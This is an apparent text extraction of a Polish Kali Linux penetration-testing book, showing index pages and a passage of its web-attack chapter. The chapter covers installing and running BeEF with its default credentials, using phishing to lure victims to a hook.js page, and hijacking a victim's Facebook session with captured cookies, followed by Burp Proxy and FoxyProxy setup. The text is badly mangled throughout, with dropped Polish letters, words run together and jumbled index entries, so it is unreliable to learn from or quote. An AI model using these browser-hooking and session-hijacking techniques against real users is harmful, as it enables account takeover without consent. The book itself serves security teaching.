HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
232
systemu Teraz zajmiemy si technikami b d cymi niejako uwie czeniem ca ego procesu ata-kowania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Dodatko-wo poka emy w jaki sposoacuteb do ataku u y hellip serwera b d cego celem ataku oraz jak z amazabezpieczenia aplikacji internetowych w ramach atakoacutew na przegl darki atakoacutew z wykorzy-staniem serweroacutew proxy oraz przechwytywania hase dost pu Omoacutewimy roacutewnie wybranemetody zak oacutecania pracy us ug internetowych za pomoc atakoacutew typu DoS
BeEF mdash Browser Exploitation Framework
Podatno ci i luki w zabezpieczeniach przegl darek mog by wykorzystywane przez z o liweoprogramowanie do zmiany zachowania przegl darki w okre lonych sytuacjach Podatno ciprzegl darek internetowych to bardzo popularny wektor ataku poniewa zdecydowana wi k-szo systemoacutew operacyjnych pod ktoacuterych kontrol dzia aj klienty aplikacji internetowychwyposa ona jest w tak czy inn przegl dark Przyjrzyjmy si zatem jednemu z najpopular-niejszych narz dzi przeznaczonych do wykorzystywania luk w zabezpieczeniach przegl darekinternetowych
Istnieje wiele interesuj cych narz dzi wspomagaj cych przeprowadzanie testoacutew penetracyjnychNarz dzia te powinny si znale w Twoim bdquohakerskimrdquo arsenale Jednym z nich z pewno ci jestprogram BeEF (ang Browser Exploitation Framework) BeEF to pakiet zbudowany w oparciuo przegl dark ktoacutery bdquopodpina si rdquo do jednej przegl darki lub nawet kilku przegl darek w syste-mie klienta i tworzy przyczoacute ek ktoacutery mo na wykorzysta jako baz do dalszych atakoacutew U yt-kownik mo e zosta bdquozaatakowanyrdquo kiedy odwiedza specjalnie przygotowan stron internetow po czym kontynuuje przegl danie innych witryn nie zdaj c sobie zupe nie sprawy z tego enapastnik ma ju pe ny dost p do jego sesji BeEF potrafi omin zaroacutewno sieciowe urz dze-nia zabezpieczaj ce jak i mechanizmy ochronne instalowane bezpo rednio na hostach takiejak systemy antywirusowe Staje si to mo liwe dzi ki wykorzystywaniu luk w zabezpieczeniachpowszechnie spotykanych przegl darek takich jak Internet Explorer czy Firefox
Pakiet BeEF nie jest do czany do wersji 10 systemu Kali Linux ale mo esz pobra go zestrony httpbeefprojectcom Mamy jednak nadziej e ze wzgl du na swoj du popularnow rodowisku pentesteroacutew i nie tylko BeEF znajdzie si w kolejnych wydaniach systemu KaliLinux
Aby zainstalowa pakiet BeEF powiniene otworzy okno terminala i z poziomu u ytkownikaroot wykona nast puj ce polecenia
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
233
apt-get updateapt-get install beef-xss
Polecenie apt-get update mo e zapyta Ci o zgod na aktualizacj lub nadpisanie starszychwersji niektoacuterych plikoacutew W wi kszo ci przypadkoacutew powiniene po prostu zaakceptowa od-powiedzi domy lne Po zako czeniu procesu aktualizacji mo esz wykona drugie polecenieapt-get install beef-xss ktoacutere rozpocznie instalacj pakietu BeEF
Kiedy przedstawione wy ej polecenie zako czy dzia anie pakiet BeEF b dzie gotowy do u ytku
Aby uruchomi program BeEF w oknie terminala przejd do katalogu usrsharebeef-xss i wpiszpolecenie beef co spowoduje uruchomienie serwera pakietu Gdy serwer zostanie uru-chomiony na ekranie wy wietl si adresy URL pozwalaj ce na zarz dzanie pakietem i ata-kowanie u ytkownikoacutew
Aby zarz dza serwerem pakietu uruchom przegl dark i w polu adresu wpisz adres URL ko -cz cy si ci giem znakoacutew uipanel Je eli chcesz przechwyci sesj ofiary za pomoc pakietuBeEF powiniene przekierowa j na adres URL serwera ko cz cy si ci giem znakoacutew hookjsAby to zrobi b dziesz musia opracowa odpowiedni strategi post powania ktoacutera pozwoliCi przekona potencjalne ofiary do odwiedzenia takiego adresu Mo esz do tego celu wyko-rzysta roacute ne techniki takie jak phishing czy ataki socjotechniczne
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
234
W naszym przypadku panel zarz dzania pakietu jest dost pny pod adresem http17216861443000uipanel Domy lna nazwa u ytkownika i has o dost pu brzmi identycznie beef
Kiedy ofiara ataku wejdzie lub zostanie przekierowana na stron hookjs napastnik zobaczyna panelu zarz dzania serwera BeEF informacj o nowej przegl darce BeEF doda nowy systemdo listy potencjalnych celoacutew i b dzie wy wietla go za ka dym razem kiedy ofiara ataku po-jawi si w sieci Przegl darki ofiar ktoacutere w danej chwili s od czone od internetu b d po-datne na atak kiedy znowu pod cz si do sieci niezale nie od tego czy ponownie odwiedzwcze niej stron hookjs Na kolejnym rysunku przedstawiono wygl d g oacutewnego okna paneluzarz dzania serwera BeEF z widocznymi opcjami ataku na przechwycony system
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
235
Widoczny na poprzednim rysunku host ktoacuterego przegl darka zosta a przechwycona to lap-top pracuj cy pod kontrol systemu Windows BeEF potrafi odkry bardzo wiele szczegoacute oacutewna temat przechwyconego systemu na przyk ad to czy ofiara u ywa przegl darki Firefox czyhost pracuje pod kontrol 32- czy 64-bitowego systemu operacyjnego jakie dodatkowewtyczki zosta y zainstalowane w przegl darce czy obs uga skryptoacutew i apletoacutew Java jest w -czona itp Na skompromitowanych systemach napastnik mo e zdalnie wykonywa roacute ne po-lecenia w cza sygna d wi kowy przechwytywa ciasteczka sesji tworzy zrzuty ekranuprzechwytywa wszystkie znaki wpisywane z klawiatury a nawet wykorzystywa przechwy-con przegl dark jako serwer proxy do atakowania innych systemoacutew Przyk adem zastoso-wania pakietu mo e by sytuacja w ktoacuterej u ytkownik skompromitowanego systemu logujesi do serwisu takiego jak Facebook Napastnik dzi ki pakietowi BeEF mo e przechwyciciasteczko takiej sesji a nast pnie u y go w swojej przegl darce do przechwycenia sesjiu ytkownika i uzyskania dzi ki temu pe nego dost pu do konta Facebook ofiary Nietrudnosobie wyobrazi e w takiej sytuacji z o liwe i destrukcyjne mo liwo ci napastnika s prak-tycznie nieograniczone Raz uchwycony przyczoacute ek daje nieograniczony dost p do przegl -darki ofiary i jej sesji
BeEF dostarcza napastnikowi szczegoacute owych informacji na temat zaatakowanego systemu i logujewszystkie wykonywane w nim polecenia Informacje o zaatakowanym systemie oraz dziennikwykonanych polece mog by bez problemu skopiowane i wklejone do raportu ko cowego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
236
Obrona przed atakami dokonywanymi z u yciem narz dzi penetracyjnych opartych na prze-gl darkach jest bardzo trudna Najlepszym rozwi zaniem jest oczywi cie zadbanie o to aby zaw-sze korzysta z najnowszej wersji przegl darki z zainstalowanymi najnowszymi pakietami aktuali-zacji oraz z wy czon mo liwo ci uruchamiania apletoacutew Java czy animacji Flash Oproacutecztego dodatkow warstw zabezpiecze mog zapewni rozwi zania pozwalaj ce na wykrywanienajcz ciej spotykanych zagro e takie jak system NGIPS (ang Next Generation IntrusionPrevention System) Znacz c wi kszo ofiar atakoacutew przeprowadzonych z wykorzystaniemnarz dzi takich jak BeEF stanowi u ytkownicy ktoacuterzy klikn li specjalnie przygotowane czezamieszczone w wiadomo ci poczty elektronicznej lub udost pnione w popularnych serwi-sach spo eczno ciowych przez napastnika podaj cego si za kogo innego godnego zaufania
FoxyProxy mdash wtyczka przegl darki Firefox
Je eli masz przegl dark Firefox i chcesz u ywa serweroacutew proxy takich jak ZAP mdash Zed At-tack Proxy czy BURP do testowania aplikacji internetowych to mo esz skorzysta z wtyczkiFoxyProxy ktoacutera znakomicie upraszcza proces prze czania oraz w czania i wy czania po-szczegoacutelnych serweroacutew proxy Inaczej moacutewi c FoxyProxy to wtyczka przegl darki Firefoxpozwalaj ca na atwe zarz dzanie serwerami proxy modyfikacj ich ustawie oraz ich w -czanie i wy czanie Wtyczk FoxyProxy mo esz pobra z sieciowego repozytorium rozsze-rze programy Firefox
Gdy zainstalujesz wtyczk na pasku narz dzi w goacuternej cz ci g oacutewnego okna przegl darkipojawi si ikona FoxyProxy Kiedy j klikniesz lewym przyciskiem myszy wy wietli si oknoopcji i ustawie wtyczki
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
237
Aby doda nowy serwer proxy do wtyczki FoxyProxy powiniene wykona polecenia przed-stawione poni ej
1 Kliknij przycisk Add New Proxy Na ekranie pojawi si nowe okno dialogowe 2 Wybierz opcj Manual Proxy Configuration 3 Wpisz adres IP lub nazw serwera proxy oraz podaj numer jego portukomunikacyjnego
4 Kliknij przycisk OK aby zapisa ustawienia nowego serwera
W tym momencie wtyczka FoxyProxy jest jeszcze wy czona co oznacza e ca y ruch sieciowygenerowany przez przegl dark odbywa si bez po rednictwa serwera proxy (w polu SelectMode jest ustawiona opcja Completely disable FoxyProxy) Aby u y wybranego serwera proxyrozwi list Select Mode i wybierz z niej dan opcj Jak wida dzi ki takiemu rozwi zaniumo esz szybko prze cza przegl dark na roacute ne serwery proxy lub ca kowicie wy czymo liwo korzystania z serwera proxy
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
238
BURP Proxy
BURP Proxy to narz dzie ktoacutere przechwytuje ruch HTTP oraz HTTPS co pozwala pentesterowina badanie funkcjonowania aplikacji internetowych wyszukiwanie luk w ich zabezpieczeniachoraz analizowanie ruchu sieciowego generowanego mi dzy serwerem aplikacji a klientemPakiet BURP Proxy cieszy si ogromn popularno ci nie tylko ze wzgl du na zdolno prze-prowadzania analizy ruchu sieciowego ale roacutewnie a mo e przede wszystkim ze wzgl du namo liwo modyfikacji i retransmitowania przesy anych da bdquow locierdquo Za chwil wyja nimy jakwykorzysta pakiet BURP Proxy do modyfikowania da i wykradania danych uwierzytel-niaj cych u ytkownikoacutew
Pami taj e BURP Proxy to narz dzie wchodz ce w sk ad rozbudowanego pakietu narz dzio nazwie Burp Suite Kiedy u ytkownik wpisuje na pasku adresu swojej przegl darki wybranyadres URL taki jak na przyk ad httpwwwDrChaoscom oczekuje e zostanie przeniesionyna tak stron Serwer proxy przechwytuje takie danie i przesy a je do serwera niejakobdquow imieniurdquo danego klienta Serwery proxy s zazwyczaj wykorzystywane do monitorowania ge-nerowanego ruchu sieciowego oraz ochrony klientoacutew przed potencjalnie szkodliwymi danymi(np witrynami ze z o liwym oprogramowaniem czy witrynami zainfekowanymi) Jako pente-ster mo esz wykorzystywa serwery proxy do przechwytywania ruchu sieciowego wysy anegoprzez klienta a nast pnie kopiowania modyfikowania i retransmitowania jego da
Aby w systemie Kali Linux uruchomi program BURP Suite w menu g oacutewnym przejd do grupyKali Linux a nast pnie wybierz polecenie SniffingSpoofingWeb Sniffersburpsuite
Na ekranie pojawi si g oacutewne okno pakietu Burp Suite
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
239
Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia
Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy
Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
240
W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej
Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox
Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
241
jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie
Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania
Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)
Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku
Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)
Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
242
Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
243
Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter
Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza
Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie
Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom
Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
244
Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
245
